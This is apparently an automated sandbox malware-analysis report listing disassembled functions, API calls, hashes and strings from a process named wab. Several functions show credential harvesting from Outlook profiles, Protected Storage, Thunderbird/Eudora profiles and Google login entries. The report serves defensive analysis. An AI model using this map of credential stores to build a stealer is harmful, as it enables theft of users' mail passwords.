                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                    APIs
                    • memset.MSVCRT ref: 0040F6E2
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                    • strlen.MSVCRT ref: 0040F70D
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                    APIs
                    • memset.MSVCRT ref: 00402FD7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                    • strlen.MSVCRT ref: 00403006
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                    APIs
                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                    • GetStockObject.GDI32(00000000), ref: 004143C6
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                    • String ID:
                    • API String ID: 764393265-0
                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$System$File$LocalSpecific
                    • String ID:
                    • API String ID: 979780441-0
                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                    APIs
                    • memcpy.MSVCRT ref: 004134E0
                    • memcpy.MSVCRT ref: 004134F2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$DialogHandleModuleParam
                    • String ID:
                    • API String ID: 1386444988-0
                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                    APIs
                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: InvalidateMessageRectSend
                    • String ID: d=E
                    • API String ID: 909852535-3703654223
                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                    APIs
                    • wcschr.MSVCRT ref: 0040F79E
                    • wcschr.MSVCRT ref: 0040F7AC
                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcschr$memcpywcslen
                    • String ID: "
                    • API String ID: 1983396471-123907689
                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                    APIs
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • _memicmp.MSVCRT ref: 0040C00D
                    • memcpy.MSVCRT ref: 0040C024
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FilePointer_memicmpmemcpy
                    • String ID: URL
                    • API String ID: 2108176848-3574463123
                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemcpy
                    • String ID: %2.2X
                    • API String ID: 2789212964-323797159
                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf
                    • String ID: %%-%d.%ds
                    • API String ID: 3988819677-2008345750
                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                    APIs
                    • memset.MSVCRT ref: 0040E770
                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSendmemset
                    • String ID: F^@
                    • API String ID: 568519121-3652327722
                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PlacementWindowmemset
                    • String ID: WinPos
                    • API String ID: 4036792311-2823255486
                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                    APIs
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 0040DCE9
                    • wcscat.MSVCRT ref: 0040DCFF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamewcscatwcsrchr
                    • String ID: _lng.ini
                    • API String ID: 383090722-1948609170
                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                    • API String ID: 2773794195-880857682
                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                    APIs
                    • memcmp.MSVCRT ref: 00408AF3
                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                    • memcmp.MSVCRT ref: 00408B2B
                    • memcmp.MSVCRT ref: 00408B5C
                    • memcpy.MSVCRT ref: 00408B79
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID:
                    • API String ID: 231171946-0
                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcslen$wcscat$wcscpy
                    • String ID:
                    • API String ID: 1961120804-0
                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                    Execution Graph

                    Execution Coverage:2.4%
                    Dynamic/Decrypted Code Coverage:20.3%
                    Signature Coverage:0.5%
                    Total number of Nodes:848
                    Total number of Limit Nodes:16
                    execution_graph 34120 40fc40 70 API calls 34294 403640 21 API calls 34121 427fa4 42 API calls 34295 412e43 _endthreadex 34296 425115 76 API calls __fprintf_l 34297 43fe40 133 API calls 34124 425115 83 API calls __fprintf_l 34125 401445 memcpy memcpy DialogBoxParamA 34126 440c40 34 API calls 33252 444c4a 33271 444e38 33252->33271 33254 444c56 GetModuleHandleA 33255 444c68 __set_app_type __p__fmode __p__commode 33254->33255 33257 444cfa 33255->33257 33258 444d02 __setusermatherr 33257->33258 33259 444d0e 33257->33259 33258->33259 33272 444e22 _controlfp 33259->33272 33261 444d13 _initterm __getmainargs _initterm 33262 444d6a GetStartupInfoA 33261->33262 33264 444d9e GetModuleHandleA 33262->33264 33273 40cf44 33264->33273 33268 444dcf _cexit 33270 444e04 33268->33270 33269 444dc8 exit 33269->33268 33271->33254 33272->33261 33324 404a99 LoadLibraryA 33273->33324 33275 40cf64 33275->33268 33275->33269 33276 40cf60 33276->33275 33331 410d0e 33276->33331 33278 40cf6f 33335 40ccd7 ??2@YAPAXI 33278->33335 33280 40cf9b 33349 407cbc 33280->33349 33285 40cfc4 33367 409825 memset 33285->33367 33286 40cfd8 33372 4096f4 memset 33286->33372 33291 407e30 _strcmpi 33293 40cfee 33291->33293 33292 40d181 ??3@YAXPAX 33294 40d1b3 33292->33294 33295 40d19f DeleteObject 33292->33295 33297 40cff2 RegDeleteKeyA 33293->33297 33298 40d007 EnumResourceTypesA 33293->33298 33396 407948 ??3@YAXPAX ??3@YAXPAX 33294->33396 33295->33294 33297->33292 33300 40d047 33298->33300 33301 40d02f MessageBoxA 33298->33301 33299 40d1c4 33397 4080d4 ??3@YAXPAX 33299->33397 33303 40d0a0 CoInitialize 33300->33303 33377 40ce70 33300->33377 33301->33292 33394 40cc26 strncat memset RegisterClassA CreateWindowExA 33303->33394 33304 40d1cd 33398 407948 ??3@YAXPAX ??3@YAXPAX 33304->33398 33309 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33395 40c256 PostMessageA 33309->33395 33311 40d061 ??3@YAXPAX 33311->33294 33314 40d084 DeleteObject 33311->33314 33312 40d09e 33312->33303 33314->33294 33316 

                    Control-flow Graph (function 4082cd-40841a: memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy)
                    APIs
                    • memset.MSVCRT ref: 0040832F
                    • memset.MSVCRT ref: 00408343
                    • memset.MSVCRT ref: 0040835F
                    • memset.MSVCRT ref: 00408376
                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • strlen.MSVCRT ref: 004083E9
                    • strlen.MSVCRT ref: 004083F8
                    • memcpy.MSVCRT ref: 0040840A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                    • String ID: 5$H$O$b$i$}$}
                    • API String ID: 1832431107-3760989150
                    APIs
                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                    • strlen.MSVCRT ref: 00407F5C
                    • strlen.MSVCRT ref: 00407F64
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindstrlen$FirstNext
                    • String ID: ACD
                    • API String ID: 379999529-620537770

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 00401E8B
                    • strlen.MSVCRT ref: 00401EA4
                    • strlen.MSVCRT ref: 00401EB2
                    • strlen.MSVCRT ref: 00401EF8
                    • strlen.MSVCRT ref: 00401F06
                    • memset.MSVCRT ref: 00401FB1
                    • atoi.MSVCRT ref: 00401FE0
                    • memset.MSVCRT ref: 00402003
                    • sprintf.MSVCRT ref: 00402030
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • memset.MSVCRT ref: 00402086
                    • memset.MSVCRT ref: 0040209B
                    • strlen.MSVCRT ref: 004020A1
                    • strlen.MSVCRT ref: 004020AF
                    • strlen.MSVCRT ref: 004020E2
                    • strlen.MSVCRT ref: 004020F0
                    • memset.MSVCRT ref: 00402018
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    • _mbscpy.MSVCRT ref: 00402177
                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                    • API String ID: 1846531875-4223776976

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                    • DeleteObject.GDI32(?), ref: 0040D1A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                    • API String ID: 745651260-375988210
                    • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                    • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                    • _mbscpy.MSVCRT ref: 00403E54
                    Strings
                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                    • PStoreCreateInstance, xrefs: 00403C44
                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                    • pstorec.dll, xrefs: 00403C30
                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc_mbscpy
                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                    • API String ID: 1197458902-317895162
                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
